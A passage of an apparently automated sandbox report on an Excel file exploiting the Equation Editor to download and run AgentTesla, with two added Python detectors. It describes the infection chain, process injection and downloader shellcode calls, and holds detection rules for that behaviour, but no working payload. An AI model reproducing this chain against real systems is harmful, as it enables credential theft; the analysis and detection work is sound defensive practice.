                                2022-08-05 09:41:36 UTC89INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 80 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: ( @
                                2022-08-05 09:41:36 UTC93INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 00 00 01 00 06 00 10 10 10 00 01 00 04 00 28 01 00 00 02 00 10 10 00 00 01 00 08 00 68 05 00 00 03 00 10 10 00 00 01 00 20
                                Data Ascii: (h



                                Target ID:0
                                Start time:11:41:32
                                Start date:05/08/2022
                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                Imagebase:0x13f440000
                                File size:28253536 bytes
                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:2
                                Start time:11:41:53
                                Start date:05/08/2022
                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                Imagebase:0x400000
                                File size:543304 bytes
                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Visual Basic
                                Reputation:high

                                Target ID:5
                                Start time:11:42:00
                                Start date:05/08/2022
                                Path:C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
                                Imagebase:0xff0000
                                File size:8704 bytes
                                MD5 hash:6D370555D43F89189867FD72222C6059
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                Reputation:low

                                Target ID:6
                                Start time:11:42:05
                                Start date:05/08/2022
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
                                Imagebase:0x960000
                                File size:204800 bytes
                                MD5 hash:B3CC5F3514BF58EE55153795CF183754
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                Reputation:low

                                Target ID:7
                                Start time:11:42:07
                                Start date:05/08/2022
                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                Wow64 process (32bit):true
                                Commandline:dw20.exe -x -s 536
                                Imagebase:0x10000000
                                File size:33936 bytes
                                MD5 hash:FBA78261A16C65FA44145613E3669E6E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
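The process list above is the whole infection chain in five entries: EXCEL.EXE; EQNEDT32.EXE, the 32-bit Equation Editor started COM-style with -Embedding; an 8704-byte .NET executable written to %AppData%\Roaming and executed; a 32-bit powershell_ise.exe taken from SysWOW64, whose AgentTesla Yara matches sit at 0x402000, a region that is not part of its own image (base 0x960000), consistent with the "Injects a PE file into a foreign processes" signature and with a 32-bit loader needing a 32-bit host; and dw20.exe, the error-reporting tool that appears when a .NET process crashes, which is what "One or more processes crash" refers to. The Python below is an added example, not Joe Sandbox output: it re-creates those five processes as constructed process-creation events and runs three detections over them, mirroring "Office equation editor starts processes", "Office equation editor drops PE file" (its process-creation side only, since these events carry no file writes) and the injection signature. The ppid links are assumptions: the report gives start times, not parents, and in real telemetry EQNEDT32.EXE is launched by DCOM, so its parent is svchost.exe rather than EXCEL.EXE; that is why the rules key on what EQNEDT32.EXE spawns, never on who spawned it. Rule names and the directory lists are the example's own.

```python
import ntpath

# Constructed telemetry: one process-creation event per process in the report,
# using the report's Target IDs as PIDs. The ppid links are assumptions made for
# this example; the report lists processes and start times but not parents.
# EQNEDT32.EXE is COM-activated ("-Embedding"), so in real telemetry its parent is
# the DCOM launcher (svchost.exe), not EXCEL.EXE; it is modelled as a root here.
EVENTS = [
    {"pid": 0, "ppid": None, "time": "11:41:32",
     "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"},
    {"pid": 2, "ppid": None, "time": "11:41:53",
     "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"},
    {"pid": 5, "ppid": 2, "time": "11:42:00",
     "image": r"C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe"},
    {"pid": 6, "ppid": 5, "time": "11:42:05",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"},
    {"pid": 7, "ppid": 6, "time": "11:42:07",
     "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe"},
]

# Directories an unprivileged user can write to; a payload dropped by an Office
# exploit has to live somewhere like this. Both lists are the example's own choice.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\",
                 "\\users\\public\\", "\\programdata\\")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
               "c:\\windows\\microsoft.net\\")


def basename(path):
    return ntpath.basename(path).lower()


def in_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)


def is_system_binary(path):
    return path.lower().startswith(SYSTEM_DIRS)


def detect(events):
    """Return (rule, pid) findings for three behaviours the report flags."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        # "Office equation editor starts processes": EQNEDT32.EXE has no
        # legitimate reason to spawn anything at all.
        if basename(parent["image"]) == "eqnedt32.exe":
            findings.append(("equation_editor_spawns_process", e["pid"]))
            # The child is an .exe in user-writable space: the dropped payload.
            if in_user_writable(e["image"]) and e["image"].lower().endswith(".exe"):
                findings.append(("equation_editor_runs_dropped_exe", e["pid"]))
        # A Windows binary started by an executable living in user-writable space
        # is the usual host for PE injection / process hollowing.
        if in_user_writable(parent["image"]) and is_system_binary(e["image"]):
            findings.append(("system_binary_child_of_user_writable_exe", e["pid"]))
    return findings


def ancestry(events, pid):
    """Image names from the chain's root down to `pid`."""
    by_pid = {e["pid"]: e for e in events}
    chain, cur = [], by_pid.get(pid)
    while cur is not None:
        chain.append(basename(cur["image"]))
        cur = by_pid.get(cur["ppid"])
    return chain[::-1]


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid} ({' > '.join(ancestry(EVENTS, pid))})")
```

Run stand-alone it prints one line per finding with the reconstructed chain. The third rule fires on path alone, because these events carry no signer or integrity data; on real telemetry, add the parent's signature status and the child's image-load events before trusting it, and remember that the first rule is the one with near-zero false positives: EQNEDT32.EXE never needs children.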


                                  Execution Graph

                                  Execution Coverage:48.5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:100%
                                  Total number of Nodes:42
                                  Total number of Limit Nodes:2
                                  execution_graph 187 38a8b6f LoadLibraryW 195 38a8b97 187->195 189 38a8b84 190 38a8bf9 URLDownloadToFileW 189->190 191 38a8bfc 7 API calls 189->191 192 38a8c17 6 API calls 190->192 194 38a8ba8 191->194 193 38a8c05 192->193 194->190 196 38a8b9a 195->196 198 38a8ba8 URLDownloadToFileW 196->198 214 38a8bfc URLDownloadToFileW 196->214 202 38a8c17 198->202 203 38a8c19 202->203 217 38a8c2d 203->217 205 38a8c93 ExitProcess 212 38a8c05 215 38a8c17 6 API calls 214->215 216 38a8c05 214->216 215->216 218 38a8c30 217->218 219 38a8c60 4 API calls 218->219 220 38a8c4e 219->220 221 38a8c70 2 API calls 220->221 222 38a8c67 221->222 223 38a8c1e 222->223 224 38a8c90 ExitProcess 222->224 223->205 227 38a8c60 LoadLibraryW 223->227 225 38a8c84 224->225 225->223 226 38a8c93 ExitProcess 225->226 228 38a8c67 227->228 229 38a8c70 2 API calls 227->229 230 38a8c90 ExitProcess 228->230 231 38a8c4e 228->231 229->228 232 38a8c84 230->232 234 38a8c70 231->234 232->231 233 38a8c93 ExitProcess 232->233 235 38a8c73 234->235 236 38a8c90 ExitProcess 235->236 237 38a8c84 236->237 238 38a8c67 237->238 239 38a8c93 ExitProcess 237->239 238->212 240 38a8c90 238->240 241 38a8c93 ExitProcess 240->241
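The execution_graph line above is Joe Sandbox's flattened dump of the traced shellcode in EQNEDT32.EXE: node entries of the form `id address [API | n API calls]` interleaved with `a->b` edges. The Python below is an added example, not part of the Joe Sandbox report: it parses that dump into a graph, lists the resolved API names, and checks whether a call ordering typical of an Equation Editor downloader stub (LoadLibraryW, then URLDownloadToFileW, then ExitProcess) exists on some path from a trace entry point. The sample string is copied verbatim from the report; the token grammar, the function names and the ordering check are the example's own.

```python
import re
from collections import defaultdict

# Constructed input: the execution_graph text dumped for EQNEDT32.EXE (Target ID 2)
# in the report, copied verbatim so the parser can run offline.
EXECUTION_GRAPH = (
    "execution_graph 187 38a8b6f LoadLibraryW 195 38a8b97 187->195 189 38a8b84 "
    "190 38a8bf9 URLDownloadToFileW 189->190 191 38a8bfc 7 API calls 189->191 "
    "192 38a8c17 6 API calls 190->192 194 38a8ba8 191->194 193 38a8c05 192->193 "
    "194->190 196 38a8b9a 195->196 198 38a8ba8 URLDownloadToFileW 196->198 "
    "214 38a8bfc URLDownloadToFileW 196->214 202 38a8c17 198->202 203 38a8c19 "
    "202->203 217 38a8c2d 203->217 205 38a8c93 ExitProcess 212 38a8c05 "
    "215 38a8c17 6 API calls 214->215 216 38a8c05 214->216 215->216 218 38a8c30 "
    "217->218 219 38a8c60 4 API calls 218->219 220 38a8c4e 219->220 "
    "221 38a8c70 2 API calls 220->221 222 38a8c67 221->222 223 38a8c1e 222->223 "
    "224 38a8c90 ExitProcess 222->224 223->205 227 38a8c60 LoadLibraryW 223->227 "
    "225 38a8c84 224->225 225->223 226 38a8c93 ExitProcess 225->226 228 38a8c67 "
    "227->228 229 38a8c70 2 API calls 227->229 230 38a8c90 ExitProcess 228->230 "
    "231 38a8c4e 228->231 229->228 232 38a8c84 230->232 234 38a8c70 231->234 "
    "232->231 233 38a8c93 ExitProcess 232->233 235 38a8c73 234->235 "
    "236 38a8c90 ExitProcess 235->236 237 38a8c84 236->237 238 38a8c67 237->238 "
    "239 38a8c93 ExitProcess 237->239 238->212 240 38a8c90 238->240 "
    "241 38a8c93 ExitProcess 240->241"
)

# Two token shapes: an edge "src->dst", or a node "id address" followed by an
# optional label that is either a resolved API name or an "<n> API calls"
# placeholder for sub-calls Joe Sandbox did not expand on this line.
TOKEN = re.compile(
    r"\b(?P<src>\d+)->(?P<dst>\d+)"
    r"|\b(?P<id>\d+) (?P<addr>[0-9a-f]+)\b"
    r"(?: (?P<label>\d+ API calls|[A-Za-z_]\w*))?"
)


def parse_execution_graph(text):
    """Return ({node_id: (address, label_or_None)}, [(src, dst), ...])."""
    nodes, edges = {}, []
    for m in TOKEN.finditer(text):
        if m.group("src") is not None:
            edges.append((int(m.group("src")), int(m.group("dst"))))
        else:
            nodes[int(m.group("id"))] = (m.group("addr"), m.group("label"))
    return nodes, edges


def successors(edges):
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    return succ


def roots(nodes, edges):
    """Nodes with no incoming edge: where the trace enters the shellcode."""
    targets = {dst for _, dst in edges}
    return sorted(n for n in nodes if n not in targets)


def api_names(nodes):
    """Resolved API labels only; '<n> API calls' placeholders are left out."""
    return {label for _, label in nodes.values()
            if label and not label.endswith("API calls")}


def reachable(succ, start):
    """All nodes reachable from `start`, including `start` itself."""
    seen, stack = set(), [start]
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        stack.extend(succ[n])
    return seen


def calls_in_order(nodes, edges, start, sequence):
    """True if some path from `start` visits nodes labelled sequence[0],
    sequence[1], ... in that order (other calls may sit in between)."""
    succ = successors(edges)
    frontier = {start}
    for api in sequence:
        hits = {n for origin in frontier
                for n in reachable(succ, origin)
                if nodes.get(n, (None, None))[1] == api}
        if not hits:
            return False
        frontier = hits
    return True


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(EXECUTION_GRAPH)
    print(len(nodes), "nodes,", len(edges), "edges; entry nodes:", roots(nodes, edges))
    print("resolved APIs:", sorted(api_names(nodes)))
    for start in roots(nodes, edges):
        shape = calls_in_order(nodes, edges, start,
                               ["LoadLibraryW", "URLDownloadToFileW", "ExitProcess"])
        print(f"downloader ordering from node {start}: {shape}")
```

The parse recovers the 42 nodes the report counts and two entry nodes, 187 (the LoadLibraryW at 38a8b6f) and 189. The ordering check treats the "<n> API calls" placeholders as opaque, so it only reasons about calls Joe Sandbox resolved on this line; the second LoadLibraryW at 38a8c60, which the callgraph and the control-flow graphs below also show, is reached only after URLDownloadToFileW, which is why a four-step LoadLibraryW, URLDownloadToFileW, LoadLibraryW, ExitProcess sequence matches from node 187 while no path from node 189 has a LoadLibraryW after its download.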

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_036BB34E 1 Function_038A8B6F 3 Function_038A8BFC 1->3 10 Function_038A8C17 1->10 11 Function_038A8B97 1->11 2 Function_038A8CBF 3->10 4 Function_038A8C2D 5 Function_038A8C90 4->5 6 Function_038A8C60 4->6 7 Function_038A8C70 4->7 6->5 6->7 7->5 8 Function_038A8D10 9 Function_0370783C 10->4 10->5 10->6 10->7 11->3 11->10

                                  Control-flow Graph

                                  APIs
                                  • LoadLibraryW.KERNEL32 ref: 038A8B7D
                                    • Part of subcall function 038A8B97: URLDownloadToFileW.URLMON(00000000,038A8BA8,?,00000000,00000000), ref: 038A8BFE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.996370618.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: DownloadFileLibraryLoad
                                  • String ID:
                                  • API String ID: 2776762486-0
                                  • Opcode ID: a0c2422bab3c0bcf3a24ef7ab51da5e46b75dcac1cb7b0ea48e3c5fee6e75bae
                                  • Instruction ID: 63ae8ed5edc6fce024965280c58d35de04bea6e7bb2146ce5d431698dfdd02cc
                                  • Opcode Fuzzy Hash: a0c2422bab3c0bcf3a24ef7ab51da5e46b75dcac1cb7b0ea48e3c5fee6e75bae
                                  • Instruction Fuzzy Hash: 4D21159040DBC12FE716D7B84E7AA65BFA47E03204B0DCACFC4D58E4A3C394A646D766
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 14 38a8c60 LoadLibraryW 15 38a8c67 14->15 16 38a8c62 call 38a8c70 14->16 17 38a8c69-38a8c87 call 38a8c90 15->17 18 38a8cdd-38a8cde 15->18 16->15 33 38a8cd9 17->33 34 38a8c89 17->34 19 38a8ce0-38a8ce5 18->19 20 38a8d56-38a8d78 18->20 21 38a8cfa-38a8cfc 19->21 22 38a8ce7-38a8ceb 19->22 26 38a8d0c-38a8d0d 21->26 22->21 25 38a8ced-38a8cf4 22->25 29 38a8cf8 25->29 30 38a8cf6 25->30 32 38a8cfe-38a8d07 29->32 30->21 36 38a8d09 32->36 37 38a8cd0-38a8cd3 32->37 38 38a8cdb-38a8cdf 33->38 39 38a8ce1-38a8ce5 33->39 34->21 40 38a8c8b-38a8c95 ExitProcess 34->40 36->26 37->32 41 38a8cd5 37->41 38->25 38->39 39->21 39->22 41->33
                                  APIs
                                  • LoadLibraryW.KERNEL32(038A8C4E), ref: 038A8C60
                                    • Part of subcall function 038A8C70: ExitProcess.KERNEL32(00000000,?,038A8C84), ref: 038A8C95
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.996370618.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: ExitLibraryLoadProcess
                                  • String ID:
                                  • API String ID: 2206315515-0
                                  • Opcode ID: c075552f11b00380bb7d55ab29910a9d5bfb3ff50c054c1ee495d6d423b57776
                                  • Instruction ID: 4d044b256853e2a530e02eb0799e363fde336f9ee69dd4752762f1dde9a3ad1c
                                  • Opcode Fuzzy Hash: c075552f11b00380bb7d55ab29910a9d5bfb3ff50c054c1ee495d6d423b57776
                                  • Instruction Fuzzy Hash: E0014E39906F06E9F694FAEC84C8659FFD0FB91714F5885D3D501CA021D2609446DF3D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 44 38a8c17-38a8c28 call 38a8c2d 49 38a8c2a-38a8c67 call 38a8c60 call 38a8c70 44->49 50 38a8c93-38a8c95 ExitProcess 44->50 58 38a8c69-38a8c7c 49->58 59 38a8cdd-38a8cde 49->59 65 38a8c7f-38a8c87 call 38a8c90 58->65 60 38a8ce0-38a8ce5 59->60 61 38a8d56-38a8d78 59->61 62 38a8cfa-38a8cfc 60->62 63 38a8ce7-38a8ceb 60->63 67 38a8d0c-38a8d0d 62->67 63->62 66 38a8ced-38a8cf4 63->66 74 38a8cd9 65->74 75 38a8c89 65->75 70 38a8cf8 66->70 71 38a8cf6 66->71 73 38a8cfe-38a8d07 70->73 71->62 77 38a8d09 73->77 78 38a8cd0-38a8cd3 73->78 79 38a8cdb-38a8cdf 74->79 80 38a8ce1-38a8ce5 74->80 75->62 81 38a8c8b-38a8c90 75->81 77->67 78->73 82 38a8cd5 78->82 79->66 79->80 80->62 80->63 81->50 82->74
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.996370618.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: 1344612fcfac8767b13517417e7ca55d336cf204b69795767fdb169aa5e0abe5
                                  • Instruction ID: 6c320e5f8b08c0582feb1823baa53d5cd8b8d16d2e492facf12ddc866ee77038
                                  • Opcode Fuzzy Hash: 1344612fcfac8767b13517417e7ca55d336cf204b69795767fdb169aa5e0abe5
                                  • Instruction Fuzzy Hash: 2A11007480AB81AEF791FBFCC888B0ABFE5BF91200F1895D9D5408A152DA74D805DF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 84 38a8b97-38a8ba2 86 38a8ba8-38a8c00 URLDownloadToFileW call 38a8c17 84->86 87 38a8ba3 call 38a8bfc 84->87 93 38a8c05-38a8c15 86->93 87->86
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.996370618.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: DownloadFile
                                  • String ID:
                                  • API String ID: 1407266417-0
                                  • Opcode ID: 67d525d6f48ac61ec9b18bcd6d85f0bb95344e304786f316d0fdbacbce94af86
                                  • Instruction ID: ce8c5ea753948090233e6a9fb1d27d1c4cf32fa41443f09d22942e8f4d8a78c9
                                  • Opcode Fuzzy Hash: 67d525d6f48ac61ec9b18bcd6d85f0bb95344e304786f316d0fdbacbce94af86
                                  • Instruction Fuzzy Hash: 8811FE9090D7D15FD712C7B88D7AA50BFA42E03204B0DCACFC4C88F4A3D7A49142EB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 96 38a8c70-38a8c87 call 38a8c90 102 38a8cd9 96->102 103 38a8c89 96->103 104 38a8cdb-38a8cdf 102->104 105 38a8ce1-38a8ce5 102->105 106 38a8cfa-38a8cfc 103->106 107 38a8c8b-38a8c95 ExitProcess 103->107 104->105 108 38a8ced-38a8cf4 104->108 105->106 110 38a8ce7-38a8ceb 105->110 111 38a8d0c-38a8d0d 106->111 112 38a8cf8 108->112 113 38a8cf6 108->113 110->106 110->108 115 38a8cfe-38a8d07 112->115 113->106 117 38a8d09 115->117 118 38a8cd0-38a8cd3 115->118 117->111 118->115 119 38a8cd5 118->119 119->102
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.996370618.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: 9972dc509afebeb48d15e8a22faac023fdd527fc02b6dda4ce751b45f19a6b7f
                                  • Instruction ID: 5f693ae9856dfb97440d4891f037b389ae9d90971bed7260300deb5873c25953
                                  • Opcode Fuzzy Hash: 9972dc509afebeb48d15e8a22faac023fdd527fc02b6dda4ce751b45f19a6b7f
                                  • Instruction Fuzzy Hash: 12F0F959906B42A1F7B0F2EC44047A6EFD5AB51A04FCC88C79D82C4045D1A898C3CE3D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 120 38a8c2d-38a8c67 call 38a8c60 call 38a8c70 129 38a8c69-38a8c87 call 38a8c90 120->129 130 38a8cdd-38a8cde 120->130 145 38a8cd9 129->145 146 38a8c89 129->146 131 38a8ce0-38a8ce5 130->131 132 38a8d56-38a8d78 130->132 133 38a8cfa-38a8cfc 131->133 134 38a8ce7-38a8ceb 131->134 138 38a8d0c-38a8d0d 133->138 134->133 137 38a8ced-38a8cf4 134->137 141 38a8cf8 137->141 142 38a8cf6 137->142 144 38a8cfe-38a8d07 141->144 142->133 148 38a8d09 144->148 149 38a8cd0-38a8cd3 144->149 150 38a8cdb-38a8cdf 145->150 151 38a8ce1-38a8ce5 145->151 146->133 152 38a8c8b-38a8c95 ExitProcess 146->152 148->138 149->144 153 38a8cd5 149->153 150->137 150->151 151->133 151->134 153->145
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.996370618.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: ExitLibraryLoadProcess
                                  • String ID:
                                  • API String ID: 2206315515-0
                                  • Opcode ID: 540d9297a408a45d47faf81bfff063f1dffb4d0729a7aadb181138d36ca86638
                                  • Instruction ID: ee456af75d1de7824ea35aa932f2d53402cf85f2cb339392d00c0bceabfcec34
                                  • Opcode Fuzzy Hash: 540d9297a408a45d47faf81bfff063f1dffb4d0729a7aadb181138d36ca86638
                                  • Instruction Fuzzy Hash: D3F0A965C0EB806DF691E7FC888974ABFE4AF41600F0899CA8485CA051D6749405CF75
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 156 38a8c90-38a8c95 ExitProcess
                                  APIs
                                  • ExitProcess.KERNEL32(00000000,?,038A8C84), ref: 038A8C95
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.996370618.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                                  • Instruction ID: 7509033ca948316697719d628b7034e54ea344d75a6a98c66cafd8fe3af7e7fc
                                  • Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                                  • Instruction Fuzzy Hash: C7D012712129019FE244DF58CD44F17F76AFFC4611F14C254E5058B655D730D991CAA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 158 38a8bfc-38a8bfe URLDownloadToFileW 159 38a8c05-38a8c15 158->159 160 38a8c00 call 38a8c17 158->160 160->159
                                  APIs
                                  • URLDownloadToFileW.URLMON(00000000,038A8BA8,?,00000000,00000000), ref: 038A8BFE
                                    • Part of subcall function 038A8C17: ExitProcess.KERNEL32(00000000,?,038A8C84), ref: 038A8C95
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.996370618.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: DownloadExitFileProcess
                                  • String ID:
                                  • API String ID: 1989547487-0
                                  • Opcode ID: 0c5d10258b99953255b29f10826d1516c146f16d49d4bc6dfa2faddd692d9ee8
                                  • Instruction ID: 61e8eded15241aaa38997fb78bd732dccbc8f189403e4d3c2b3d72cfb885c17a
                                  • Opcode Fuzzy Hash: 0c5d10258b99953255b29f10826d1516c146f16d49d4bc6dfa2faddd692d9ee8
                                  • Instruction Fuzzy Hash: B8C0022055EBD00EE6A2E3F84969A257FE02F07704F0D58CAC0C48F1A3D6199556FB22
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:43.7%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:70%
                                  Total number of Nodes:30
                                  Total number of Limit Nodes:0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
